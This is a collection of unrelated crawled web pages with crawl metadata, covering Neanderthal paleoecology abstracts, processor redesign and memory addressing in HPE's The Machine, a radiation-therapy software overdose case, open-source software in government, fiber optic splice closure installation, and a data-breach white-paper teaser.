email@example.com or Allison Shelton at firstname.lastname@example.org, or by calling (202) 222-2350.
<urn:uuid:44fa7eea-618f-4d93-bae0-e525b528b8e7>
CC-MAIN-2017-04
https://www.cedmagazine.com/print/news/2009/10/cable-a-bastion-against-the-aporkalypse
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00213-ip-10-171-10-70.ec2.internal.warc.gz
en
0.928708
568
2.546875
3
Fiorenza L.,University of New England of Australia | Benazzi S.,University of Bologna | Benazzi S.,Max Planck Institute for Evolutionary Anthropology | Henry A.G.,Max Planck Institute for Evolutionary Anthropology | And 8 more authors. American Journal of Physical Anthropology | Year: 2015 Neanderthals have been commonly depicted as top predators who met their nutritional needs by focusing entirely on meat. This information mostly derives from faunal assemblage analyses and stable isotope studies: methods that tend to underestimate plant consumption and overestimate the intake of animal proteins. Several studies in fact demonstrate that there is a physiological limit to the amount of animal proteins that can be consumed: exceeding these values causes protein toxicity that can be particularly dangerous to pregnant women and newborns. Consequently, to avoid food poisoning from meat-based diets, Neanderthals must have incorporated alternative food sources in their daily diets, including plant materials as well. © 2014 American Association of Physical Anthropologists. Source Rodriguez-Gomez G.,National Research Center sobre la Evolucion Humana | Mateos A.,National Research Center sobre la Evolucion Humana | Martin-Gonzalez J.A.,University of Burgos | Blasco R.,Gibraltar Museum | And 3 more authors. PLoS ONE | Year: 2014 Increasing evidence suggests that the European human settlement is older than 1.2 Ma. However, there is a fierce debate about the continuity or discontinuity of the early human settlement of Europe. In particular, evidence of human presence in the interval 0.7-0.5 Ma is scarce in comparison with evidence for the previous and later periods. Here, we present a case study in which the environmental conditions at Sierra de Atapuerca in the early Middle Pleistocene, a period without evidence of human presence, are compared with the conditions in the previous period, for which a relatively intense human occupation is documented. With this objective in mind, the available resources for a human population and the intensity of competition between secondary consumers during the two periods are compared using a mathematical model. The Gran Dolina site TD8 level, dated to 0.7-0.6 Ma, is taken as representative of the period during which Atapuerca was apparently not occupied by humans. Conditions at TD8 are compared with those of the previous period, represented by the TD6-2 level, which has yielded abundant evidence of intense human occupation. The results show that survival opportunities for a hypothetical human population were lower at TD8 than they were at TD6-2. Increased resource competition between secondary consumers arises as a possible explanation for the absence of human occupation at Atapuerca in the early Middle Pleistocene. © 2014 Rodríguez-Gómez et al. Source Rodriguez-Vidal J.,University of Huelva | Finlayson G.,Gibraltar Museum | Finlayson C.,Gibraltar Museum | Finlayson C.,University of Toronto | And 4 more authors. Geomorphology | Year: 2013 The Rock of Gibraltar, at the south-western extreme of the Iberian Peninsula and 21 km from the North African coast, is a 6-km long limestone peninsula which was inhabited by Neanderthals from MIS 5e until the end of MIS 3. A total of 8 sites, either with Neanderthal fossils or their Mousterian lithic technology, have been discovered on the Rock. Two, Gorham's and Vanguard Caves, are the subject of ongoing research. These caves are currently at sea level, but during MIS 3 faced an emerged coastal shelf with the shoreline as far as 5
km away at times. They hold a unique archive of fauna and flora, in the form of fossils, charcoal and pollen, helping environmental reconstruction of now-submerged shelf landscapes. In addition, geological and geomorphological features - a 300-metre dune complex, elevated aeolian deposits, raised beaches, scree, speleothems - complement the biotic picture. The work is further complemented by a study of the ecology of the species recorded at the site, using present-day observations. The species composition in this fossil record closely matches the present day fauna and vegetation of the Doñana National Park, SW Spain: a mosaic of pine groves, coastal dunes, shrubland and seasonal wetlands and currently the richest reserve in terms of biodiversity in the Iberian Peninsula, located only 100 km to the northwest from Gibraltar. All this information permits, for the first time, the quantification of the vegetation structure of the ancient coastal plain and the modelling of the spatio-temporal dynamics of the MIS 3 coastal shelf off Gibraltar. © 2013 Elsevier B.V. Source Blain H.-A.,Institute Catala Of Paleoecologia Humana I Evolucio Social | Blain H.-A.,Rovira i Virgili University | Gleed-Owen C.P.,CGO Ecology Ltd | Lopez-Garcia J.M.,Institute Catala Of Paleoecologia Humana I Evolucio Social | And 7 more authors. Journal of Human Evolution | Year: 2013 Gorham's Cave is located in the British territory of Gibraltar in the southernmost end of the Iberian Peninsula. Recent excavations, which began in 1997, have exposed an 18 m archaeological sequence that covered the last evidence of Neanderthal occupation and the first evidence of modern human occupation in the cave. By applying the Mutual Climatic Range method on the amphibian and reptile assemblages, we propose here new quantitative data on the terrestrial climatic conditions throughout the latest Pleistocene sequence of Gorham's Cave. In comparison with current climatic data, all mean annual temperatures were about 1.6-1.8 °C lower in this region. Winters were colder and summers were similar to today. Mean annual precipitation was slightly lower, but according to the Aridity Index of Gaussen there were only four dry months during the latest Pleistocene as opposed to five dry months today during the summer. The climate was Mediterranean and semi-arid (according to the Aridity Index of Dantin-Revenga) or semi-humid (according to the Aridity Index of Martonne). The atmospheric temperature range was higher during the latest Pleistocene, mainly due to lower winter temperatures. Such data support recent bioclimatic models, which indicate that high rainfall levels may have been a significant factor in the late survival of Neanderthal populations in southern Iberia. The Solutrean levels of Gorham's Cave and climate records from cores in the Alboran Sea indicate increasing aridity from Marine Isotope Stage (MIS) 3-2. Because Neanderthals seem to have been associated with woodland habitats, we propose that lessening rainfall may have caused the degradation of large areas of forest and may have made late surviving Neanderthal populations more vulnerable outside southern refuges like the Rock of Gibraltar. © 2013 Elsevier Ltd. Source Lopez-Garcia J.M.,Rovira i Virgili University | Cuenca-Bescos G.,University of Zaragoza | Finlayson C.,The Gibraltar Museum | Finlayson C.,University of Toronto | And 2 more authors.
Quaternary International | Year: 2011 Gorham's cave is located in the British territory of Gibraltar in the southernmost end of the Iberian Peninsula. The cave was discovered in 1907 and first excavated in the 1950s by John Waechter of the Institute of Archaeology in London. New excavations, which started in 1997, have exposed 18 m of human occupation in the cave, spanning the Late Pleistocene, as well as including brief Phoenician, Carthaginian and Neolithic occupations. The Late Pleistocene levels consist of two Upper Palaeolithic occupations, attributed to the Solutrean and Magdalenian technocomplexes (Level III), and which are dated, by AMS radiocarbon, to between 18,000 and 10,000 years ago. The underlying Mousterian layer (Level IV), dated by AMS radiocarbon to between 23,000 and 33,000 years ago, is separated from Level III by an archaeologically sterile layer, which spans some 4000 years. This paper presents previously unpublished palaeoenvironmental and paleoclimatic reconstructions of Gorham's cave, during these Pleistocene occupations, using the small mammal assemblage. The small mammal assemblage at Gorham's cave comprises at least 12 species: 4 insectivores (Crocidura russula, Sorex gr. coronatus-araneus, Sorex minutus and Talpa occidentalis); 3 chiropters (Myotis myotis, Myotis nattereri and Miniopterus schreibersii); and 5 rodents (Microtus (Iberomys) cabrerae, Microtus (Terricola) duodecimcostatus, Arvicola sapidus, Apodemus sylvaticus and Eliomys quercinus). The presence of these small mammal species indicates that the landscape surrounding the Rock of Gibraltar was predominantly an open habitat, with the presence of woodland and water stream meadows, as well as the presence of larger bodies of water. These results are then compared with pollen and charcoal analysis as well as other faunal proxies, such as the herpetofauna, bird and large mammal assemblages, providing an accurate reconstruction of the climatic and environmental conditions that prevailed during the Late Pleistocene in the southernmost end of the Iberian Peninsula. © 2011 Elsevier Ltd and INQUA. Source
<urn:uuid:bcc78680-f967-45de-8edd-c4c5b0bdbff3>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/gibraltar-museum-780916/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280929.91/warc/CC-MAIN-20170116095120-00515-ip-10-171-10-70.ec2.internal.warc.gz
en
0.916455
2,060
3.6875
4
The current generation of microprocessors is ill-equipped to meet the growing demands of data processing. Stated another way, the amount of data that needs to be processed is quickly outpacing the performance of chips. With the current processor-centric design, the data is shuttled back and forth from processor to memory, a time-consuming activity. Additionally, all that back-and-forth movement requires a lot of electricity, far more than is consumed by the actual processing. Employing the current processor design in future exascale supercomputers (machines that will require about a billion cores) will create an impossible energy demand. If computing progress is to continue its forward march and if the next big goal of exaflop-scale machines is to be achieved, it will require a revamping of the current processor architecture. And thanks to advancements in the field of nanoelectronics, the time for such a redesign may finally be at hand. New York Times author John Markoff explores the issue in a recent article. The semiconductor industry has long warned about a set of impending bottlenecks described as “the wall,” a point in time where more than five decades of progress in continuously shrinking the size of transistors used in computation will end. If progress stops it will not only slow the rate of consumer electronics innovation, but also end the exponential increase in the speed of the world’s most powerful supercomputers — 1,000 times faster each decade. Researchers from industry and academia alike have begun to address the challenge, as Markoff notes. Hewlett-Packard researchers are designing stacked chip systems that bring the memory and processor much closer together, reducing the distance the data must travel and in doing so greatly reducing energy demands. Parthasarathy Ranganathan, a Hewlett-Packard electrical engineer, explains that the “systems will be based on memory chips he calls ‘nanostores’ as distinct from today’s microprocessors. They will be hybrids, three-dimensional systems in which lower-level circuits will be based on a nanoelectronic technology called the memristor, which Hewlett-Packard is developing to store data. The nanostore chips will have a multistory design, and computing circuits made with conventional silicon will sit directly on top of the memory to process the data, with minimal energy costs.” The science of nanoelectronics has generated other promising technologies designed to make the energy demands of future systems more manageable. Researchers at Harvard and Mitre Corporation have developed nanoprocessor “tiles” based on electronic switches made from ultrathin germanium-silicon wires. I.B.M. and Samsung have partnered on phase-change memories, in which an electric current is used to switch a material from a crystalline to an amorphous state and back again. I.B.M. researchers are also looking at carbon nanotube technology to create hybrid systems that draw on advancements in both nanoelectronics and microelectronics.
<urn:uuid:277698a6-6d41-4608-af98-06efac93b209>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/02/28/growing_data_deluge_prompts_processor_redesign/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281424.85/warc/CC-MAIN-20170116095121-00423-ip-10-171-10-70.ec2.internal.warc.gz
en
0.914405
635
3.4375
3
The Bits And Bytes Of The Machine’s Storage
January 25, 2016 Mark Funk
By now, as we have seen in other parts of this series, we have a pretty good sense for the basic topology of The Machine from Hewlett Packard Enterprise. In it are massive amounts of fabric memory, which any node and application can access, no matter where they are executing. In there somewhere, though, is your file, your object, your database table. You know it’s yours and only you have the right to access it. So, what in The Machine is ensuring that only you get to access it? And, in doing so, still allow you efficient access to it. Folks designing The Machine speak absolutely correctly about the need to have integrated security and integrity throughout The Machine’s design. So let’s start by looking at one very low level aspect of that integrated security. As you have seen, every processor on any node can access the contents of any byte of fabric memory, no matter the node on which it resides. You have also seen that only local processors can access a node’s DRAM. You might also know that in more standard symmetric multi-processor systems, or SMPs, every byte of the physical memory is known by a unique real address. A program’s instructions executing on a processor generate such real addresses, using that real address to uniquely request the data found there, and then work with that data. Knowing that the DRAM is only locally accessible, you might picture both the volatile DRAM and the fabric memory as being mapped under a single real address space as in the following figure: In such a mapping, any processor could generate a real address into local DRAM and that address would only access the memory from its own node, and no other. The hardware guarantees that merely from the notion of private/local memory. However, with fabric memory being global, the whole of the fabric memory would be spread out across the remainder of the real address space, allowing every byte found there to be accessed with a unique real address, no matter the processor using that real address. Yes, that would work, but that is not the mental picture to have for The Machine. Indeed, suppose it were, and any processor could have concurrent access to hundreds of petabytes of persistent memory. Just to keep it simple, let’s say The Machine’s fabric memory size someday becomes 256 pebibytes; that is 256 x 1024^5, or 2^8 x 2^50 bytes, requiring at least 58 bits to span this real address space. If a processor were to need to concurrently access all of this memory, the processor would need to be capable of supporting this full 58-bit address. For comparison, the Intel Xeon Phi supports a 40-bit physical address in 64-bit mode. It’s not that it can’t be done, but that is quite a jump. And from Keith Packard’s presentation we find that The Machine did not make that jump: “In our current implementation, we are using an ARM-64 core; a multi-core processor. It has 48 bits of virtual addressing, but it has only 44 bits of physical addressing. . . . Out of that, we get 53 bits (real address), and that can address 8 petabytes of memory. . . and we translate those into actual memory fabric addresses, which are 75 bits for an address space potential of 32 zettabytes.” Still, if such a huge global real address were supported, that means that if any processor can generate such a real address – which also means that if any thread in any process in any OS can generate such a real address – it then also has full access to the whole of The Machine’s memory at any moment.
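For readers who want to check the address-space arithmetic quoted above, a few lines of Python confirm the figures; this is plain unit conversion, nothing specific to The Machine.

```python
# Address-space sizes implied by the bit widths quoted above.
PiB = 1024 ** 5   # pebibyte

print(2**58 / PiB)        # 256.0 -> 58 bits span 256 PiB of fabric memory
print(2**53 / PiB)        # 8.0   -> 53 bits span 8 PiB ("8 petabytes" in the quote)
print(2**75 / 1024**7)    # 32.0  -> 75-bit fabric addresses span 32 ZiB ("32 zettabytes")
print(2**44 / 1024**4)    # 16.0  -> 44 physical address bits span 16 TiB
```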
If this were the way that all programs actually access memory, system security and integrity would have a real problem. There are known ways – ways used on most systems and The Machine as well (as we’ll see in a subsequent article in this series) – by which this can be avoided; done right, today’s systems tend to be quite secure. Even so, The Machine takes addressing-based security and integrity a step further, even at this low level of real addresses, as we will see next. In the real addressing model used by The Machine, rather than the real address space being global (as in the above figure), picture instead a real address space per node, or more to the point, one scoped only to the processors of each node. Said differently, the processors of any given node have their own private real address space. Part of that is, of course, used to access the node-local DRAM. But now also picture regions of each node’s real address space as being mapped securely by the hardware onto windows of various sizes into fabric memory, any part of fabric memory. The processors of each node could potentially generate arbitrary real addresses within their own real address space, but it is only those real-address regions securely mapped by the hardware onto physical memory that can actually be accessed. No mapping, no access. Even though the node’s real address space may be smaller than the whole of fabric memory, those portions of fabric memory needed for concurrent access are nonetheless accessible. For example, a file manager on your node wants access to some file residing in fabric memory, perhaps a single file residing in – spread out amongst – a set of different regions on a number of different nodes. Your OS requests the right to access all of that file. Portions of the file are each known to reside physically on a particular set of nodes and, within those nodes, at particular regions within them. That fact alone does nothing for your program or the processor accessing it; the file is at well-defined locations in physical memory, but the processor proper can only generate real addresses. Said differently, the program and the processor could generate real addresses with the intent of accessing fabric memory, but that real address is not the physical tuple like Node ID::Media Controller ID::DIMM::Offset where the file’s bytes really reside. To actually allow the access, your node’s hardware must be capable of translating the processor’s real address into such a physical representation. That real-to-physical region mapping is held and set securely in the hardware; your program knows nothing about it, only trusted code and the hardware do. Your processor generates the real address of the file as your OS perceives it and the hardware supporting the fabric memory translates that real address to the actual location(s) of your file. Of course, persistent or not, the fabric memory is also just memory; slower, yes, but there is a lot of it. Redrawing the previous figure slightly more abstractly as below (it’s still the same four nodes), we can see that if your program needs more memory, it can ask for more; upon doing so, your program is provided a real address – a real address as understood by your node’s processors – and that real address has been mapped onto some physical region of fabric memory (which can include the local node’s fabric memory). Additionally, the fabric memory may enable data persistence, but if it is only more “memory” that your program needs, your program need not manage it as persistent.
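To make the windowing idea concrete, here is a deliberately simplified sketch of a per-node real-to-physical mapping table. The class names, field layout and tuple format are invented for illustration; they are not the actual translation hardware or firmware interfaces in The Machine.

```python
# Toy model of per-node real-address windows mapped onto fabric memory.
# Each window maps a contiguous real-address range on this node to a
# (node_id, media_controller, dimm, offset) location in fabric memory.
from dataclasses import dataclass

@dataclass
class Window:
    real_base: int      # start of the window in this node's real address space
    size: int           # window length in bytes
    node_id: int        # node whose fabric memory backs the window
    media_ctrl: int     # media controller on that node
    dimm: int           # NVM DIMM behind that controller
    phys_offset: int    # byte offset within that DIMM

class FabricMapper:
    def __init__(self, windows):
        self.windows = windows          # set up by trusted code only

    def translate(self, real_addr):
        for w in self.windows:
            if w.real_base <= real_addr < w.real_base + w.size:
                return (w.node_id, w.media_ctrl, w.dimm,
                        w.phys_offset + (real_addr - w.real_base))
        raise MemoryError("no window maps this real address: access denied")

# A node that has been granted two windows into remote fabric memory:
mapper = FabricMapper([
    Window(real_base=0x4000_0000, size=1 << 30, node_id=7, media_ctrl=0, dimm=2, phys_offset=0),
    Window(real_base=0x8000_0000, size=1 << 28, node_id=3, media_ctrl=1, dimm=0, phys_offset=1 << 34),
])
print(mapper.translate(0x4000_1000))   # lands in node 7's fabric memory
```

The point of the sketch is the failure path: a real address that falls outside every granted window simply cannot reach fabric memory, which is the "no mapping, no access" property described above.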
As we saw earlier, blocks in fabric memory are cacheable, each block tagged in the cache using real addresses. Once such blocks are flushed from the cache, the real address is provided to this mapping hardware, which in turn identifies where in fabric memory the flushed block is to be stored. If your object did not need to actually be persistent, rather than explicitly forcing cached blocks out to memory, you can just allow such blocks to sooner or later be written back, even to fabric memory. Your program need not know when or even if; as with DRAM, the changed data can sooner or later make its way back to memory. Interestingly, as a different concept, even though every node shown here does have a processor (and its own DRAM), if one or more nodes are only contributing fabric memory to the system, while it is only the persistent memory of such nodes being used, the processors and DRAM on such nodes could conceivably be shut down, saving the cost of keeping them powered.
The Shared Versus Persistent Data Attributes Of Fabric Memory
As implied in the previous section, the topology of The Machine introduces an interesting side effect, perhaps even an anomaly, showing the two sides of fabric memory. The volatile DRAM memory is accessible by only the processors residing on the same node, so any sharing possible is by only the processors on that node. That is as far as that sharing goes. So if processor-based sharing is to occur amongst any of The Machine’s processors and OSes, it’s the non-volatile fabric memory that is being used for that purpose, not the volatile DRAM. Interestingly, for much of that sharing the data shared need not also require persistence. See the point? The Machine’s non-volatile fabric memory is being used for essentially two separate reasons:
- For active data sharing, for data that does not need to be maintained as persistent, and
- Separately, as memory which truly is persistent, and – interestingly – is likely being shared as a result.
I did not actually say that the inter-node shared data does not need to be in fabric memory. It does. Inter-node sharing cannot count on cache coherence. In order for another node to see the data being shared, that shared data must be in fabric memory and invalidated from the cache of nodes that want to see the changes. Said differently, suppose processors of two nodes, Node A and B, want to share data. A processor on Node A has made the most recent change to the shared data, with the change residing still in the cache of that processor. If cache coherence spanned multiple nodes, a processor on Node B would be capable of seeing that changed data, even if still in Node A’s processor’s cache. But cache coherence does not span nodal boundaries. So if Node A’s processor wants to make the change visible to the processors on Node B, Node A’s processor must flush the changed cache lines back out to fabric memory. Additionally, in order for a processor on Node B to see this same data, that data block cannot then reside in a Node B processor’s cache; if it does, that block (unchanged) must also be flushed from that cache to allow a Node B processor to see the change. This seems complex, and it is, but it is what enables inter-node sharing of changing data, and The Machine provides APIs to support such sharing. So, yes, we did need to make the shared data reside in fabric memory in order to allow it to be seen by another node, but we did not actually need it to be persistent.
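The ordering just described (the writer flushes its changed lines to fabric memory, and the reader drops any stale copy before re-reading) can be modeled abstractly. The sketch below simulates two nodes' caches as Python dictionaries purely to illustrate that protocol; it is not The Machine's actual sharing API, which the article only mentions in passing.

```python
# Toy simulation of inter-node sharing without cross-node cache coherence.
fabric = {0x1000: "old value"}      # persistent fabric memory, visible to all nodes
cache_a, cache_b = {}, {}           # per-node caches; coherence does NOT span nodes

def read(cache, addr):
    if addr not in cache:
        cache[addr] = fabric[addr]  # miss: fetch the line from fabric memory
    return cache[addr]

def write(cache, addr, value):
    cache[addr] = value             # the change lands in the writer's cache only

def flush(cache, addr):
    fabric[addr] = cache.pop(addr)  # push the changed line out to fabric memory

def invalidate(cache, addr):
    cache.pop(addr, None)           # drop a stale copy so the next read misses

read(cache_b, 0x1000)               # Node B caches the old value
write(cache_a, 0x1000, "new value") # Node A changes the data in its own cache
print(read(cache_b, 0x1000))        # still "old value": no cross-node coherence
flush(cache_a, 0x1000)              # step 1: writer flushes to fabric memory
invalidate(cache_b, 0x1000)         # step 2: reader invalidates its stale copy
print(read(cache_b, 0x1000))        # now "new value"
```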
That item of data is in persistent fabric memory in order for it to be available to be seen by Node B and others, but actual persistence to failure is a bit more subtle than that. After the changed cache lines have been successfully flushed, fabric memory holds the changed/shared data, and it will still be there after power cycling; but does there exist enough information for the restarted system to find the changed data? It’s that which we’ll try to explain in the next section.
<urn:uuid:9f4febed-7a4b-4958-ad94-5b8a820409dc>
CC-MAIN-2017-04
https://www.nextplatform.com/2016/01/25/the-bits-and-bytes-of-the-machines-storage/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00149-ip-10-171-10-70.ec2.internal.warc.gz
en
0.945244
2,372
2.953125
3
Medical Physicists' Role
Perhaps nothing shows the ravages of faulty calculations as clearly as cancer. The patients who were suffering in Panama had cancers of the pelvis. Pelvic organs such as the intestines and kidneys are acutely sensitive to radiation. Before a cancer patient such as Garcia is exposed to radiation, a doctor devises a treatment plan that determines what dose of radiation can safely be directed at the tumor. The physician considers the tumor's position and depth in the body, the likelihood that the cancer has spread to surrounding tissue, the location and sensitivity of nearby organs and the best angles of attack. As part of the plan, the doctor figures out how to place metal shields, known as "blocks," above the area where the tumor is located. These blocks, usually made of lead or a metal alloy called cerrobend, protect normal or sensitive tissue from the gamma rays to come. The doctor hands his plan to a medical physicist, who feeds information on the size, shape and location of the blocks into a software package. These packages generally create a 3-D picture of how the dose will be distributed, showing how the radiation will "sum" as beams coming in from different angles intersect at depth in the patient's tissue. Once the doctor prescribes a dosage, the software calculates the duration of treatment. The physicists in Panama were carrying out a doctor's instruction to be more protective, adding a fifth block to the four the hospital often used on patients in cancer treatments. The extra block could help protect patients whose tissues were especially sensitive due to previous surgeries or radiation treatments. Multidata's planning software was designed to calculate treatments when there were four or fewer blocks, according to the company's general business manager, Mick Conley. Saldaña, however, read Multidata's manual and concluded she could make the software account for a fifth block. According to an August 2001 report from the IAEA, Saldaña found the software didn't work only when she entered the dimensions of each block individually, up to four. She found it also allowed her to enter the dimensions of all five blocks as a single, composite shape - for instance, a rectangle with one triangular block sitting in each corner and a fifth square block protruding, tooth-like, down into the rectangle from the top. So, using the mouse attached to her computer, she entered on the screen the coordinates of the specially shaped block - first the inner perimeter of the shape and then the outer perimeter. This is when she felt she was "home free." After all, when Saldaña entered the data for this unusual-looking block, the system produced a diagram that appeared to confirm its dimensions. She seemed to be getting confirmation from the system itself that her approach was acceptable.
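To see how a digitized block outline can quietly skew a downstream calculation, consider a toy example. This is not Multidata's algorithm and the geometry is invented; it only illustrates that a routine which is correct for separately entered perimeters can return a different area for a single composite trace, even though a plot of the same vertices looks right on screen.

```python
# Toy illustration of how a digitized block outline can silently yield the
# wrong area. The shoelace formula is standard; the geometry and numbers
# are invented and this is NOT the actual treatment-planning algorithm.
def shoelace_area(points):
    """Shoelace formula for the area of a closed polygon."""
    total = 0.0
    for (x1, y1), (x2, y2) in zip(points, points[1:] + points[:1]):
        total += x1 * y2 - x2 * y1
    return abs(total) / 2.0

outer = [(0, 0), (10, 0), (10, 10), (0, 10)]   # outer perimeter of the shield
inner = [(2, 2), (8, 2), (8, 8), (2, 8)]       # inner cut-out (the open aperture)

# Entered as two separate perimeters, the blocked area is what was intended:
intended = shoelace_area(outer) - shoelace_area(inner)   # 100 - 36 = 64

# Entered as one composite loop (outer then inner traced in the same pass),
# the same routine returns a different number, yet a plot of the vertices
# still "looks right" on screen:
composite = outer + inner
miscomputed = shoelace_area(composite)                   # 132, not 64

print(intended, miscomputed)
# Any beam-on time derived from the blocked/open area would be skewed accordingly.
```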
<urn:uuid:b18c6a67-6a11-42df-a35b-135a5edfe8e7>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/Can-Software-Kill/4
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280410.21/warc/CC-MAIN-20170116095120-00543-ip-10-171-10-70.ec2.internal.warc.gz
en
0.962582
597
2.96875
3
Government agencies create custom software when solutions aren't available off the shelf -- you simply won't find a welfare payment system down at the local office supply store. When government agencies create software, they don't usually collaborate with agencies with similar needs, which is horribly inefficient and wasteful. But government agencies that use open source software actually enable sharing software tools among agencies with similar roles and responsibilities, creating better ROI and increased opportunity for collaboration. In essence, open source software is software that has been copyrighted and distributed under the terms of a generous licensing agreement -- typically the GNU General Public License. The agreement permits anyone to freely use, modify and redistribute software with its source code. This is in stark contrast to proprietary software, whose source codes are held secret and whose use is governed by restrictive licensing terms. It also differs from public domain software, which is expressly not copyrighted. It's easy to lose track of who really pays for software development at government agencies, and the easiest way to keep it straight is to follow the money. Your project budget is a subset of your department's budget, which is a subset of your agency's budget and so on up the ladder. The money trail stops at the taxpayer's wallet. As public employees, we have a duty to get the best return on tax dollars invested in our projects. Government agencies write software for internal use, or for use by citizens they directly serve, and it is not typically used beyond its original intent. The overall ROI in a piece of software is improved when many agencies make use of it, rather than investing more tax money into developing a similar piece of software. In short, open source gives government more bang for the taxpayer's buck. Increasing the return on tax dollars invested in the development effort is good for taxpayers. Sharing software your agency developed is clearly a windfall for the agency using your software. But what does it do for your agency? For starters, when an open source community forms around a development effort, the rewards can be astonishing. Open source software creates an environment in which developers can build on each other's successes rather than repeating each other's efforts. Why would you develop an entire program if an existing one does 80 percent of what you need? Surely it's more efficient to add the remaining 20 percent than to build the entire system from scratch. If the application is well aligned with your business needs, you can produce what's needed in a fraction of the time and cost of going it alone. Benefits are even greater when developers work cooperatively to create an application of mutual benefit. You will have more resources dedicated to a project than any one agency can afford by sharing development costs across all those contributing to the effort. The end result is higher quality, more robust software that can be created at an amazing rate.
Life After Death
What happens to your application when your project is canceled? On a good day, you put what you have into production and get as much use out of it as possible. On a bad day, the entire program is scrapped; the source code burned onto tape and placed on the shelf to gather dust; and the return on tax dollars invested ceases forever. When a dead application is open source, however, it can be adopted by other agencies.
Major subsystems could become the building blocks for entirely new applications, which is true even for ongoing projects. Another agency may pick up where you left off and add features you wanted to include, but could never afford.
<urn:uuid:1e1c091e-3963-4315-b9c9-9461d294f645>
CC-MAIN-2017-04
http://www.govtech.com/e-government/Stumping-for-Open-Source.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279224.13/warc/CC-MAIN-20170116095119-00571-ip-10-171-10-70.ec2.internal.warc.gz
en
0.947994
706
2.59375
3
Fiber optic splice closure is the equipment used to offer room for fusion splicing optical fibers. It also provides protection for the fused fiber joint point and fiber cables. There are mainly two types of closures: vertical type and horizontal type. A large variety of fiber splice closures are designed for different applications, such as aerial, duct fiber cables and direct burial. Generally speaking, they are usually used in outdoor environments, even underwater.
1. Horizontal type splice closures look like a flat or cylindrical case. They provide space and protection for optical cable splicing and jointing. They can be mounted aerial, buried, or used for underground applications. Horizontal types are used more often than vertical type (dome type) closures. Most horizontal fiber closures can accommodate hundreds of fiber connections. They are designed to be waterproof and dust proof. They can be used in temperatures ranging from -40° to 85° and can accommodate up to 106 kPa pressure. The cases are usually made of high tensile construction plastic.
2. Vertical type fiber optic splice closures look like a dome, thus they are also called dome types. They meet the same specifications as the horizontal types. They are designed for buried applications.
Applications
Splice closures provide room for splicing Outdoor Fiber Optic Cable together. Fiber splice trays are needed too. They provide the perfect protection for outside plant fiber cable joints. Fiber splice closures accept both ribbon and round fiber cables. Each type (ribbon or round cable) fits the respective requirements of different fiber splicing counts. They are widely used in optic telecommunication systems.
Fiber Optic Splice Closure Installation Steps
1. Fiber optic splice closure kit usually includes: end plate, splice tray organizer, fiber splice tray, cover, cable grommets, grommet retainer, mounting bracket and misc. hardware.
2. Fiber Cable Sheath Preparation
1) Expose the rip cord. This step involves marking the location with a tape marker, ring-cutting the outer jacket, and shaving off the outer jacket to expose the rip cord.
2) Remove the outer sheath. This step involves making a longitudinal slit down the outer sheath, peeling off the outer jacket and corrugated metal, and cutting the rip cord flush with the end of the corrugated metal.
3) Remove the inner jacket. This step involves using the rip cord under the inner jacket to slit it, cutting aramid yarns, cutting the central strength member, and cleaning the filling compound.
3. Bonding and Grounding Hardware Installation
This step involves sliding the cable clamp over the sheath, sliding the bond shoe under the corrugated metal, placing the bond plate over the bond shoe and securing the sheath grip.
4. Assembly of Cables to Closure
The preferable location for the two main cables is in the lower end plate port. If a third or fourth cable is required, it is easier to install it in the upper end plate port as a branch cable. This fiber optic splice closure is designed for two cables in each of its two ports. If only one cable will be installed in a port, the provided rubber grommet plug is used to substitute for the second cable.
1) Install Cables to End Plate. This step involves unscrewing the knob and removing the grommet retainer, positioning the end plate assembly, attaching the sheath grip to dielectric cables, sliding cables and sheath grip through, and securing the sheath grip to the backbone.
2) Grommet Installation and External Grounding.
This step involves applying B-sealant, pushing the grommets into the end plate port, and applying more B-sealant.
3) Fiber Unit Preparation and Distribution Organizer Installation. This step involves removing the loose tubes, separating each cable’s loose tubes into two groups, positioning the distribution organizer, and securing the loose tubes.
4) Splice Tray Installation. This step involves placing the splice tray, fastening the end of the splice tray to the organizer, and installing cables, grommets and external ground.
5) Optical Fiber Splicing. This step involves placing the splice holder, splicing the fibers and fastening the splice holder lid.
5. Fiber Optic Splice Closure Cover Installation.
<urn:uuid:36979838-1bef-4cca-a0fe-db4e226fce08>
CC-MAIN-2017-04
http://www.fs.com/blog/introduction-of-fiber-optic-splice-closure.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279368.44/warc/CC-MAIN-20170116095119-00415-ip-10-171-10-70.ec2.internal.warc.gz
en
0.884548
893
2.765625
3
White Paper – The Top 5 Myths of Data Breaches (185 KB)
We live in the age of the data breach. It seems that in every newspaper and on every newscast we hear about yet another breach of a computer network resulting in the theft of confidential or sensitive information. Even the media outlets themselves have become the targets of these attacks and data breaches. Within the security industry and in society in general we are in a constant search for a solution to this problem. However, many in the security industry have become so disillusioned by failure that they have adopted the opinion that a breach is inevitable and the primary focus should be on detection and response as opposed to prevention. In truth, there is no single, simple answer, and giving up is not a viable alternative. The fact that there are no easy answers does not mean we have to accept defeat. And one of the first steps is to recognize that many promoted opinions about the cause of breaches and the failures of technology are actually myths. These myths obscure a clear path to increased security and better risk management. Debunking these myths is an important step to improve the effectiveness of our security defenses against future breach attempts. This paper will expose five of the biggest myths that exist about data breaches, and explain how and why they occur.
<urn:uuid:2db5361b-60cc-493f-9075-4e20d388d45f>
CC-MAIN-2017-04
https://www.firemon.com/resources/collateral/white-paper-top-5-myths-data-breaches/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279368.44/warc/CC-MAIN-20170116095119-00415-ip-10-171-10-70.ec2.internal.warc.gz
en
0.963857
269
2.65625
3
